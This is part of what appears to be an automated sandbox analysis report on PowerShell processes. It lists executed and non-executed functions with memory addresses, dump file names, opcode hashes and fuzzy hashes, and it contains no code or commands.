                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: 3c4e52bceb2ef1294dc18bce260379e51543e0d04985502e556e5ea3152e2caa
                                                                          • Instruction ID: 85a474545bc83d7673fa0627f9c0122b2cb789e6380c38d4f25acc18be4e703c
                                                                          • Opcode Fuzzy Hash: 3c4e52bceb2ef1294dc18bce260379e51543e0d04985502e556e5ea3152e2caa
                                                                          • Instruction Fuzzy Hash: D531053190CA488FDB28DF99D8456F9BBF0EF55311F04012EE09AD3692DB746846CB91

                                                                          Executed Functions

                                                                          Function 00007FFD9B866605 Relevance: .4, Instructions: 434COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746601507.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67b2d452f1f7db19d55d9ea82cdde0d3e96729708302914aa6090a24f1314e09
                                                                          • Instruction ID: 6c2059380f5f816cf7b18bd100150cb51149a84ccf16bcced223719d3038855a
                                                                          • Opcode Fuzzy Hash: 67b2d452f1f7db19d55d9ea82cdde0d3e96729708302914aa6090a24f1314e09
                                                                          • Instruction Fuzzy Hash: B5D147B2A0FACE8FEB659B6848755B57BE0EF5A310B5901FED44CC70E3DA18A905C341
                                                                          Function 00007FFD9B799EF3 Relevance: .3, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746150060.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79b1cd7db0ff8160714321dd3c33cec2b9ae57d2b2a2b10bca7e086216e3ff4e
                                                                          • Instruction ID: e20739108aa294d012bfde30bdceb019785ab2b54e75fbea0dd872f1f3ccee8c
                                                                          • Opcode Fuzzy Hash: 79b1cd7db0ff8160714321dd3c33cec2b9ae57d2b2a2b10bca7e086216e3ff4e
                                                                          • Instruction Fuzzy Hash: 6371E837A0B79E1FFB11ABAD98B64E57B60FF11A68B0903B3C4984B0B3FD1425564641
                                                                          Function 00007FFD9B799738 Relevance: .1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746150060.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5df9ea2f04363badb4ab418029ec861cf136cd635f9fcebce2c84572b29cef4d
                                                                          • Instruction ID: e8696ac4da7871fed38748e33a3d1b0eb4709b8997bab2252c80a7039bf2c6b2
                                                                          • Opcode Fuzzy Hash: 5df9ea2f04363badb4ab418029ec861cf136cd635f9fcebce2c84572b29cef4d
                                                                          • Instruction Fuzzy Hash: 60410A71A0DB4C4FEB589F5C985A6B87BE1FB95310F00426FE44DD32A2DA70A945CBC2
                                                                          Function 00007FFD9B79A47C Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746150060.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0bb49d144a33cb0f78202cee9cd12e5179fca448d5bea1fed8b09b4eac25c4b
                                                                          • Instruction ID: 9f17aa929d05b3971bf0326d480df38c7c8e617a557281024f461de71ec92124
                                                                          • Opcode Fuzzy Hash: c0bb49d144a33cb0f78202cee9cd12e5179fca448d5bea1fed8b09b4eac25c4b
                                                                          • Instruction Fuzzy Hash: 96213A3190DB4C4FEB59DBAC984A7E97FF0EB96321F04426BD048C3162DA74941ACB91
                                                                          Function 00007FFD9B67E422 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1745534542.00007FFD9B67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B67D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b67d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6bf5c86fe371260e713ddf5e2dd848e53e4ab76b0274e9e0a0c862f25db7ec4
                                                                          • Instruction ID: 5d48fb6f4ff449ee40f066e861dd59a0f2fc95f0839e6f718f7a23d916cafd07
                                                                          • Opcode Fuzzy Hash: c6bf5c86fe371260e713ddf5e2dd848e53e4ab76b0274e9e0a0c862f25db7ec4
                                                                          • Instruction Fuzzy Hash: 3F01FB3260CE088F9AA4EF1EE48195277E1FB98320711069AD45EC765AD735F892CBC1
                                                                          Function 00007FFD9B7933B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746150060.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: fdbc930351deee709ea40e3ab036fe4a0cb1294021e6e5309a9e464b77d654a6
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 5D01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC36A1DA32E882CB41
                                                                          Function 00007FFD9B86414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746601507.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                                          • Instruction ID: 3711f19e318dccc76f9b2c3583e348ce496386c98bde0e04fa901758a26bce46
                                                                          • Opcode Fuzzy Hash: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                                          • Instruction Fuzzy Hash: 07F0E232B0E5098FD769EB4CE4518E873E0EF5832072600BAE06DC71B3CA25EC40C780
                                                                          Function 00007FFD9B864400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746601507.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                                          • Instruction ID: c47daf90cf24bf0d82ee697f53f6f659e8f67c348df4bbe04f4ce632dff96d27
                                                                          • Opcode Fuzzy Hash: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                                          • Instruction Fuzzy Hash: C2F0BE32A0E5498FD765EB4CE0618E877E0FF08320B5600BAE05DC70A3DA26AC40C780
                                                                          Function 00007FFD9B8641D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746601507.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: 303e8cec872750652a535813456dc26aab5f761697d8aa57dda118189ea9b8d0
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 5AE01A31B0C808CFDA78DB4CE0519ED73E1EB9832175601BBD14EC7571CA22ED518B80

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B798BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1746150060.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^7$K_^F$K_^J
                                                                          • API String ID: 0-377281160
                                                                          • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                          • Instruction ID: 35efcc5b1c9b7211a0a0868bddf674e2d9be0f9bcc9eaf91326202bbbfc3af42
                                                                          • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                          • Instruction Fuzzy Hash: 652138BB7085265ED7057B7CB8149ED3BA1CFA827434502F3E0A9CB093EE1470878AC0

                                                                          Executed Functions

                                                                          Function 00007FFD9B77644D Relevance: .7, Instructions: 720COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843298195.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                          • Instruction ID: 502d0898ca71ff8def96d2e3b543c5cae7588d200d8f52a63d7a13232becee29
                                                                          • Opcode Fuzzy Hash: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                          • Instruction Fuzzy Hash: 20D16231A18A4D8FDF94DF5CC4A5AAD7BE1FF68300F1542AAD409D72A9CB74E841CB81
                                                                          Function 00007FFD9B84660A Relevance: .4, Instructions: 418COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843856502.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e699781ed3642f62e930bca2e6303727a1ce3a8cdf589e3b3d4fa6d969e7607
                                                                          • Instruction ID: b17c77739480710b0852550ca54b768ac7e8f7e15a5d3448161970d49d5f56cd
                                                                          • Opcode Fuzzy Hash: 7e699781ed3642f62e930bca2e6303727a1ce3a8cdf589e3b3d4fa6d969e7607
                                                                          • Instruction Fuzzy Hash: 40C167B2B0EA8E4FEBA5EB6858645B97BD2EF5D314B1901FED45CC70E3D918A804C341
                                                                          Function 00007FFD9B84662C Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843856502.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8db2e801d414830b4731033599f830ea3ff413ca09548a8a3f582bab31086395
                                                                          • Instruction ID: 64f3b567c5ff88662329dd83fc51073d778f98caf3d3b271f06887286dc70ed7
                                                                          • Opcode Fuzzy Hash: 8db2e801d414830b4731033599f830ea3ff413ca09548a8a3f582bab31086395
                                                                          • Instruction Fuzzy Hash: 3581E1A2B0FBCA4FEBA597A844745747BD2EF1E314B1A01FED459CB1E7D918AC058301
                                                                          Function 00007FFD9B779750 Relevance: .1, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843298195.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb2d43f4a462e8b7b7b7fcf9e82d94f78f52edffbc9f123ac44e4455d16a871f
                                                                          • Instruction ID: c3c248fa49d97c702752838cee4f9cc1b3a8861d396f46b2881774e9b2c22e07
                                                                          • Opcode Fuzzy Hash: bb2d43f4a462e8b7b7b7fcf9e82d94f78f52edffbc9f123ac44e4455d16a871f
                                                                          • Instruction Fuzzy Hash: 60412B31A0EB885FDB18DB5C9C1A6B9BBE0FB55310F04426FD499C3292DA60B915C7C2
                                                                          Function 00007FFD9B65ED40 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1842452789.00007FFD9B65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B65D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b65d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 278323a58cc83c12ab01e1e68d5ecd83f440ad5a4c30150e4e925c7deea358d8
                                                                          • Instruction ID: bcd56e6a44aefcc9cddb216526c14a41be0c137a55aa9d1a9d24817c38a5c537
                                                                          • Opcode Fuzzy Hash: 278323a58cc83c12ab01e1e68d5ecd83f440ad5a4c30150e4e925c7deea358d8
                                                                          • Instruction Fuzzy Hash: 3D41257140EBC44FEB668B689C519523FF0EF57220B1A06DFD0D8CB1A3D629A846C792
                                                                          Function 00007FFD9B77A49C Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843298195.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 963e19fffc1f747fcf6673673f4314a1edf5c92ac5e95347f407bf61d250ea70
                                                                          • Instruction ID: 9bea56f74ae19370890a8b12600928dcaa3ea53b03320825049e836b0ff2f087
                                                                          • Opcode Fuzzy Hash: 963e19fffc1f747fcf6673673f4314a1edf5c92ac5e95347f407bf61d250ea70
                                                                          • Instruction Fuzzy Hash: 68210F3190C74C4FEB59DB9C984A7E97FF0EB56321F04416FD048C3166DA749456C791
                                                                          Function 00007FFD9B7733B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843298195.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: a855e341a462274d49eabc0e16f816d0981cb0317f9cc1d8a1f2f3ba92cc05e1
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: EA01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58EC36A1DA32E882CB41
                                                                          Function 00007FFD9B84414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843856502.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                          • Instruction ID: c1de2499a4879d287196033eb93758809c7c04b9fe83aac8f2df12c5a1a5a49a
                                                                          • Opcode Fuzzy Hash: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                          • Instruction Fuzzy Hash: C4F09A32B0E9098FD768EB4CE4518A8B3E1EF5932072600BAE06DC71B3CA25EC408780
                                                                          Function 00007FFD9B844400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843856502.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                          • Instruction ID: 95fcc9729cec54b0f89309f63a5c0766168dad134372329cc680b0485ebb1abe
                                                                          • Opcode Fuzzy Hash: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                          • Instruction Fuzzy Hash: 98F05E32B0E5498FD764EB5CE4658A8B7E0FF4932475600BAE15DC74A3DA25AC44C790
                                                                          Function 00007FFD9B8441D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843856502.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: cdab32a5d8804fbfaa35fd86f79cc5e0cbc80fc2a89f23c2f1827656015b2d24
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 52E01A31B0C8088FDA78DB4CE0519A973E2EB9D32171601BBD14EC7571CA22ED518B80

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B778BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1843298195.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                          • API String ID: 0-962139525
                                                                          • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                          • Instruction ID: d8f2d668ba550f6bb5f90de6853ea059a4e98626e5724acab21802a74eecdc5f
                                                                          • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                          • Instruction Fuzzy Hash: A021D477B445258ED30636ADB8519EC7781DF6437938A03F3F029CF193EE18A48B8A81

                                                                          Executed Functions

                                                                          Function 00007FFD9B823FFA Relevance: 2.4, Strings: 1, Instructions: 1164COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1999335151.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b820000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H
                                                                          • API String ID: 0-2852464175
                                                                          • Opcode ID: a756aca772b6d7b88450dbda32abd268876b666fd581e05fa3859c12174bd919
                                                                          • Instruction ID: dd59d956cd1419f52ad7af12cf4cd078bc40a08119d1b372a6c05373d902e29c
                                                                          • Opcode Fuzzy Hash: a756aca772b6d7b88450dbda32abd268876b666fd581e05fa3859c12174bd919
                                                                          • Instruction Fuzzy Hash: 72723762A0FACE0FE766976848355A43FE0EF5A250B0E01FFD19DC70E7D918A9068361
                                                                          Function 00007FFD9B826605 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1999335151.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b820000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 10b2345c830d9c0119eea9a8d97ca34224ee3aa97930c74a05f1cd28fb827c28
                                                                          • Instruction ID: 7ae05a5330cc17f33a953fbc76f512ddfaf03b96dde8a3da65748d7272cd4471
                                                                          • Opcode Fuzzy Hash: 10b2345c830d9c0119eea9a8d97ca34224ee3aa97930c74a05f1cd28fb827c28
                                                                          • Instruction Fuzzy Hash: C2D145B2F0EACE4FEBA59B6858645B57BE0EF19390F1901FED45CC70E3D918A9058341
                                                                          Function 00007FFD9B759738 Relevance: .2, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ef6dde70956136c0f0d82974d3c446675ced7934a574749a906f2ead5df6611
                                                                          • Instruction ID: 20d889acb3dd1abb36e7b2120131a5f6d626a75b073f54a642ad1d3307988031
                                                                          • Opcode Fuzzy Hash: 7ef6dde70956136c0f0d82974d3c446675ced7934a574749a906f2ead5df6611
                                                                          • Instruction Fuzzy Hash: 60413B31A0DB884FDB189F5C984A6B87BE0FB94710F54426FE48CC3293DB60A906C7C2
                                                                          Function 00007FFD9B63EF00 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1997444025.00007FFD9B63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B63D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b63d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 782630e4d5b73df53f110bf4bafb7cd9abd8e10f3bb1483c63b34bde52de63bd
                                                                          • Instruction ID: cc4641420e9072d7cc9d6d615b1804276e573225b6e48870ed757e840a7bb3c1
                                                                          • Opcode Fuzzy Hash: 782630e4d5b73df53f110bf4bafb7cd9abd8e10f3bb1483c63b34bde52de63bd
                                                                          • Instruction Fuzzy Hash: 5041F57140EBC44FE7569B2998559523FF0EF57320B1A05DFD0C8CB1A3D625A846C7A2
                                                                          Function 00007FFD9B75A49C Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e289990912c4e15ea0574482a4b3ad9b4a76be069f9b9e746c01b780d204dad
                                                                          • Instruction ID: b9bade1e3c4001438b957467b0aa9446a1098f6acd9b240f19b323f795ce6297
                                                                          • Opcode Fuzzy Hash: 9e289990912c4e15ea0574482a4b3ad9b4a76be069f9b9e746c01b780d204dad
                                                                          • Instruction Fuzzy Hash: C021293190C64C4FDB699BAC9C4A7F97BE0EB96331F00426FD059C31A2DA646457CB91
                                                                          Function 00007FFD9B8240BF Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1999335151.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b820000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03fe84f3812567c55ff908fb754d3fdeac989f148e12f9d546df40e8ba719891
                                                                          • Instruction ID: 416203cc08ec4e6b1792358c9b15f4195d9cabc8453c3fcdf8d2db6478146270
                                                                          • Opcode Fuzzy Hash: 03fe84f3812567c55ff908fb754d3fdeac989f148e12f9d546df40e8ba719891
                                                                          • Instruction Fuzzy Hash: F121C023B0F98B4FE7B98B58446217476D1EF68290B5E00BED25ECB1AACE18EC418311
                                                                          Function 00007FFD9B8243BC Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1999335151.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b820000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2aaca5b81c9ed3b071b7397a38acc50be64fa4fb9b80c4fa8b19c88d305642bf
                                                                          • Instruction ID: b10fbe2f1f479a42b9429199d04f3a4ce222694854e906b19f49063099375f2e
                                                                          • Opcode Fuzzy Hash: 2aaca5b81c9ed3b071b7397a38acc50be64fa4fb9b80c4fa8b19c88d305642bf
                                                                          • Instruction Fuzzy Hash: 4D110232F0F5494FEBB9D75890749B837E0FF4836075A00BEE61DC75AADA19AD018360
                                                                          Function 00007FFD9B7533B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
                                                                          • Instruction ID: cf7ef4d8b077872d3d72ca59b96f52d66da0ee658e91d3e93d994fceef2844fd
                                                                          • Opcode Fuzzy Hash: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
                                                                          • Instruction Fuzzy Hash: 1C01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41
